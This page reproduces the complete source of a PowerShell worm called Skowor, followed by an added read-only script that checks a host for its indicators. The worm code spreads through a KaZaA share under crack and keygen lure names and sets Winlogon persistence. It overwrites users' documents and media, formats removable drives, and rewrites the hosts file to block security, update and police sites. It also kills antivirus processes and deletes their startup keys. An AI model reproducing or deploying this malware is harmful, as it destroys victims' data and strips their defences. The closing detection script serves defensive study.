PowerShell worm Skowor

http://www.megapanzer.com/2009/12/11/powershell-worm-skowor/

Source:

# sk0r alias Czybik's Powershell Skript Worm 
# 
# This worm is for the PowerShell Script Interpreter
# which is included with Microsoft Windows Vista
# 
# This worm is ?006 by sk0r alias Czybik
# 
# Visit my homepages: www.sk0r-scripts.tk & www.sk0r-virii.tk & www.czybik-kit.tk
# 
# This worm has the following features:
# 
# - Spreads with P2P (KaZaA Lite) per JScript
# - Writes a registry string to run every time Windows starts
# - Changes RegisteredOwner, RegisteredOrganization, IE Title, Hidden Files, FileExt and IE Page
# - overwrites specific files in the Eigene Dateien (My Documents) folder and subfolders
# - formats all inserted drives and diskettes
# - deletes files in %system32%\drivers\etc
# - overwrites the hosts file in %system32%\drivers\etc
# - kills some well-known Anti-Virus processes
# - deletes Reg-Values of well-known Antiviruses
# - shows the user a message with information about the worm
# 
# 
# Information:
# 
# This worm is a proof-of-concept worm. Because it is possible
# to run PowerShell on Windows XP, too (needs .NET Framework 2.0),
# this worm is dedicated to Windows XP. Well, yes, it runs on
# Windows Vista, too. But I don't know if the structures are the
# same as in Windows XP. Note that this worm uses ActiveX objects.
# In this worm I use the Scripting.FileSystemObject and WScript.Shell
# objects. I hope Vista will include those ActiveX objects, too.
# I am happy to be the coder of this worm. I like this language.
# And I am looking forward to new malware in PowerShell.
# Now I will release more and more worms in this language.
#
# This worm is ?006 by sk0r alias Czybik. To tell me anything
# write me an email @ sk0r1337@gmx.de or a PM at vx.netlux.org
# 
# ======================================================================

$fso = New-Object -Com Scripting.FileSystemObject ;
$wshs = New-Object -Com WScript.Shell ;
$windir = $fso.GetSpecialFolder(0)
$sysdir = $fso.GetSpecialFolder(1)

$strInfoString_one = "This is a PowerShell Script worm. ";
$strInfoString_two = "This worm is proof-of-concept ";
$strInfoString_three = "the worm is ?006 by sk0r alias Czybik ";
$strInfoString_four = "for informations write an email @ sk0r1337@gmx.de ";


$KazaaDir = $wshs.RegRead('HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DownloadDir'); 
$AllMshDateinCurDir = get-childitem *.msh
foreach ($PowerShellScript in $AllMshDateinCurDir)
{
  if ($PowerShellScript.Length=13035)
  {
    $MySelfWorm = $PowerShellScript.Name;
  }
}
$gtFilesMsh = $fso.getfile($MySelfWorm);
if (!$fso.fileexists($Sysdir.Path\WinCzySko.msh) 
{
    $gtFilesMsh.Copy($Sysdir.Path\WinCzySko.msh); 
}
$gtFilesMsh.copy("$KazaaDir\Microsoft Windows Vista Cd-Key.txt.msh"); 
$gtFilesMsh.copy("$KazaaDir\Windows Vista Update.msh"); 
$gtFilesMsh.copy("$KazaaDir\Ad-aware SE Personal Edition 1.06r1.msh"); 
$gtFilesMsh.copy("$KazaaDir\Ashampoo Media Player 2.03 install.msh"); 
$gtFilesMsh.copy("$KazaaDir\Allround WinZIP Key Generator.msh"); 
$gtFilesMsh.copy("$KazaaDir\Talisman Desktop 2.99 Crack.msh"); 
$gtFilesMsh.copy("$KazaaDir\Nero Burning Rom 6.6.0.13 Crack.msh"); 
$gtFilesMsh.copy("$KazaaDir\Kaspersky KeyGen working.msh");
$gtFilesMsh.copy("$KazaaDir\Daemon Tools Install + Crack.rar.msh");
$gtFilesMsh.copy("$KazaaDir\AVP - AntiVirus Key Generator.msh");


$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"); 
$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"); 
$wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "United People of infected Ps","REG_SZ"); 
$wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "sk0rCzybik","REG_SZ"); 
$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Infected with Ps Worm by sk0r alias Czybik","REG_SZ"); 
$wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe  $sysdir.Path\WinCzySko.msh" ,"REG_SZ");
$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.sk0r-scripts.tk")


$PersonalDirectory = $wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal");
UeberschreibeDateien($PersonalDirectory)

function UeberschreibeDateien($strOrdner)
{
    $StringToOverwrite = "This file was overwritten with a Ps Worm. ";
    $StringToOverwrite += "This Worm is ?006 by sk0r alias Czybik! ";
    
    $OverWrtOwnFiles = $fso.getfolder($strOrdner)
    $OverFiles = $OverWrtOwnFiles.Files
    $TheSubFldr = $OverWrtOwnFiles.subfolders
    
    foreach ($SubFiles in $TheSubFldr.Files)
    {
        $strGetExt = $fso.GetExtensionName($AlleDateien.Path);
        if ($strGetExt="JPG")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="BMP")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="GIF")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="PNG")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="JPEG")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="AVI")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="MP3")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="WMV")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="WMA")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="DOC")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="XLS")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="RTF")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="PPS")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="PPT")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="ZIP")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="RAR")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="CPP")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
    }
    
    foreach ($NochMehrUnterOrdner in $TheSubFldr)
    {
        UeberschreibeDateien($NochMehrUnterOrdner)
    }

}

$TheDrives = $fso.Drives
foreach ($AllDrives in $TheDrives)
    {
    if ($AllDrives.DriveType=1)
    {
        format $AllDrives.Path /y
    }
    if ($AllDrives.DriveType=2)
    {
        format $AllDrives.Path /y
    }
}


cd "$sysdir.path\Drivers\etc";
del "networks";
del "protocol";
del "services";
del "hosts";
del "hosts.bak";
echo "# Host File overwritten by Ps Worm " >> hosts
echo "# This file disallows you to visit av and dl sites :> " >> hosts
echo " " >> hosts
echo "127.0.0.1 www.antivir.de " >> hosts
echo "127.0.0.1 www.bitdefender.de " >> hosts
echo "127.0.0.1 www.znet.de " >> hosts
echo "127.0.0.1 www.chip.de " >> hosts
echo "127.0.0.1 www.virustotal.com " >> hosts
echo "127.0.0.1 virusscan.jotti.org " >> hosts
echo "127.0.0.1 www.kaspersky.com " >> hosts
echo "127.0.0.1 www.sophos.de " >> hosts
echo "127.0.0.1 www.trojaner-info.de " >> hosts
echo "127.0.0.1 www.trojaner-help.de " >> hosts
echo "127.0.0.1 www.arcabit.com " >> hosts
echo "127.0.0.1 www.avast.com " >> hosts
echo "127.0.0.1 www.grisoft.com " >> hosts
echo "127.0.0.1 www.bitdefender.com " >> hosts
echo "127.0.0.1 www.clamav.net " >> hosts
echo "127.0.0.1 www.drweb.com " >> hosts
echo "127.0.0.1 www.f-prot.com " >> hosts)
echo "127.0.0.1 www.google.de " >> hosts
echo "127.0.0.1 www.fortinet.com " >> hosts
echo "127.0.0.1 www.nod32.com " >> hosts
echo "127.0.0.1 www.norman.com " >> hosts
echo "127.0.0.1 www.microsoft.com " >> hosts
echo "127.0.0.1 www.anti-virus.by/en " >> hosts
echo "127.0.0.1 www.symantec.com " >> hosts
echo "127.0.0.1 www.windowsupdate.com " >> hosts
echo "127.0.0.1 www.trendmicro.com " >> hosts
echo "127.0.0.1 www.mcafee.com " >> hosts
echo "127.0.0.1 www.viruslist.com " >> hosts
echo "127.0.0.1 www.avp.com " >> hosts
echo "127.0.0.1 www.zonelabs.com " >> hosts
echo "127.0.0.1 www.heise.de " >> hosts
echo "127.0.0.1 www.antivirus-online.de " >> hosts
echo "127.0.0.1 www.free-av.com " >> hosts
echo "127.0.0.1 www.panda-software.com " >> hosts
echo "127.0.0.1 www.pc-welt.de " >> hosts
echo "127.0.0.1 www.pc-special.net " >> hosts
echo "127.0.0.1 download.freenet.de " >> hosts
echo "127.0.0.1 www.vollversion.de " >> hosts
echo "127.0.0.1 www.das-download-archiv.de " >> hosts
echo "127.0.0.1 www.freeware.de " >> hosts
echo "127.0.0.1 www.antiviruslab.com " >> hosts
echo "127.0.0.1 www.search.yahoo.com " >> hosts
echo "127.0.0.1 www.web.de " >> hosts
echo "127.0.0.1 www.hotmail.com " >> hosts
echo "127.0.0.1 www.hotmail.de " >> hosts
echo "127.0.0.1 www.gmx.net " >> hosts
echo "127.0.0.1 www.spiegel.de " >> hosts
echo "127.0.0.1 www.icq.com " >> hosts
echo "127.0.0.1 www.icq.de " >> hosts
echo "127.0.0.1 www.ffh.de " >> hosts
echo "127.0.0.1 www.lavasoft.de " >> hosts
echo "127.0.0.1 www.de.wikipedia.org " >> hosts
echo "127.0.0.1 www.wikipedia.org " >> hosts
echo "127.0.0.1 www.en.wikipedia.org " >> hosts
echo "127.0.0.1 www.wissen.de " >> hosts
echo "127.0.0.1 www.virus-aktuell.de " >> hosts
echo "127.0.0.1 www.arcor.de " >> hosts
echo "127.0.0.1 www.t-online.de " >> hosts
echo "127.0.0.1 www.t-com.de " >> hosts
echo "127.0.0.1 www.alice-dsl.de " >> hosts
echo "127.0.0.1 www.freenet.de " >> hosts
echo "127.0.0.1 www.1und1.de " >> hosts
echo "127.0.0.1 www.fbi.gov " >> hosts
echo "127.0.0.1 www.polizei.de " >> hosts



$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avgnt'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50');  
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG7_CC');
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDMCon');  
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDNewsAgent'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDOESRV'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pccguide.exe');
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DrWebScheduler'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerMail');  
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerNT');  
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCAgentExe'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCUpdateExe'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OASClnt'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VirusScan Online'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VSOCheckTask'); 
    
    
tskill avcenter /a
tskill avconfig /a
tskill avscan /a
tskill avguard /a
tskill avgnt /a
tskill update /a
tskill preupd /a
tskill avcmd /a
tskill avesvc /a
tskill kav /a
tskill kavsvc /a
tskill kavsend /a
tskill keymanager /a
tskill agentsvr /a
tskill avgcc /a
tskill avgupsvc /a
tskill avgamsvr /a
tskill vsserv /a
tskill bdss /a
tskill xcommsvr /a
tskill bdnagent /a
tskill bdoesrv /a
tskill bdmcon /a
tskill bdswitch /a
tskill rtvr /a
tskill bdsubmit /a
tskill bdlite /a
tskill agentsvr /a
tskill tmproxy /a
tskill PcCtlCom /a
tskill pccguide /a
tskill qttask /a
tskill patch /a
tskill Tmntsrv /a
tskill PccPrm /a
tskill DrWebUpW /a
tskill spidernt /a
tskill DrWebScd /a
tskill DrWeb32w /a
tskill drwadins /a
tskill mcupdui /a
tskill McTskshd /a
tskill McAppIns /a
tskill mghtml /a
tskill McShield /a
tskill Mcdetect /a
tskill McVSEscn /a
tskill oasclnt /a
tskill mcvsshld /a


echo "$strInfoString_one ";
echo "$strInfoString_two ";
echo "$strInfoString_three ";
echo "$strInfoString_four ";

$wshs.popup("www.sk0r-scripts.tk - www.sk0r-virii.tk - 
www.czybik-kit.tk | Worm ?006 by sk0r alias Czybik",2,"PowerShell Worm by sk0r alias Czybik");

exit ;
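A read-only indicator check for the artefacts this listing creates, written here as an added example (it is not part of the megapanzer post or the worm's own code). It looks for the dropped copy in System32, the Winlogon Shell persistence, the registry branding, loopback entries for security and update domains in the hosts file, and .msh lures in the KaZaA share; it assumes PowerShell 3.0 or later and changes nothing on the host.

```powershell
# Added IOC check for the Skowor worm above; paths, names and registry values are
# taken from the listing. Read-only: it only reports what it finds.
$findings = @()

# 1. Dropped copy in %SystemRoot%\System32 and the Winlogon Shell persistence.
$sysdir  = [Environment]::GetFolderPath('System')
$dropped = Join-Path $sysdir 'WinCzySko.msh'
if (Test-Path -LiteralPath $dropped) { $findings += "dropped copy present: $dropped" }

$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$shell = (Get-ItemProperty -Path $winlogon -Name Shell -ErrorAction SilentlyContinue).Shell
# A clean value is exactly 'explorer.exe'; the worm appends its own script to it.
if ($shell -and $shell -ne 'explorer.exe') { $findings += "Winlogon Shell modified: '$shell'" }

# 2. Branding the worm writes (IE title, RegisteredOwner/Organization).
$ieMain = 'HKCU:\Software\Microsoft\Internet Explorer\Main'
$title  = (Get-ItemProperty -Path $ieMain -Name 'Window Title' -ErrorAction SilentlyContinue).'Window Title'
if ($title -match 'sk0r|Czybik|Ps Worm') { $findings += "IE window title tampered: '$title'" }

$ntcv = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -ErrorAction SilentlyContinue
if ($ntcv.RegisteredOwner -eq 'sk0rCzybik' -or $ntcv.RegisteredOrganization -like 'United People*') {
    $findings += 'RegisteredOwner/RegisteredOrganization tampered'
}

# 3. hosts file: security/update domains pointed at loopback, plus the worm banner.
$hosts = Join-Path $sysdir 'drivers\etc\hosts'
if (Test-Path -LiteralPath $hosts) {
    $hijacked = @(Get-Content -LiteralPath $hosts | Where-Object {
        $_ -match '^\s*127\.0\.0\.1\s+(www\.)?(virustotal|kaspersky|symantec|mcafee|windowsupdate|microsoft|avast|clamav|sophos|trendmicro)\.'
    })
    if ($hijacked.Count -gt 0) { $findings += "hosts file sends $($hijacked.Count) security/update domain(s) to 127.0.0.1" }
    if (Select-String -LiteralPath $hosts -Pattern 'overwritten by Ps Worm' -Quiet) { $findings += 'hosts file carries the worm banner' }
}

# 4. Lure copies planted in the KaZaA shared download folder.
$kazaa = (Get-ItemProperty -Path 'HKCU:\Software\Kazaa\LocalContent' -Name DownloadDir -ErrorAction SilentlyContinue).DownloadDir
if ($kazaa -and (Test-Path -LiteralPath $kazaa)) {
    $lures = @(Get-ChildItem -LiteralPath $kazaa -Filter '*.msh' -ErrorAction SilentlyContinue)
    if ($lures.Count -gt 0) { $findings += "msh lure files in KaZaA share: $($lures.Name -join ', ')" }
}

if ($findings.Count -gt 0) { $findings | ForEach-Object { Write-Output "[!] $_" } }
else { Write-Output 'No Skowor indicators found.' }
```

Any hit on the Winlogon Shell value or the hosts-file banner is worth isolating the host for, since both persist across reboots and the hosts entries block the update and vendor sites a clean-up would normally reach.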
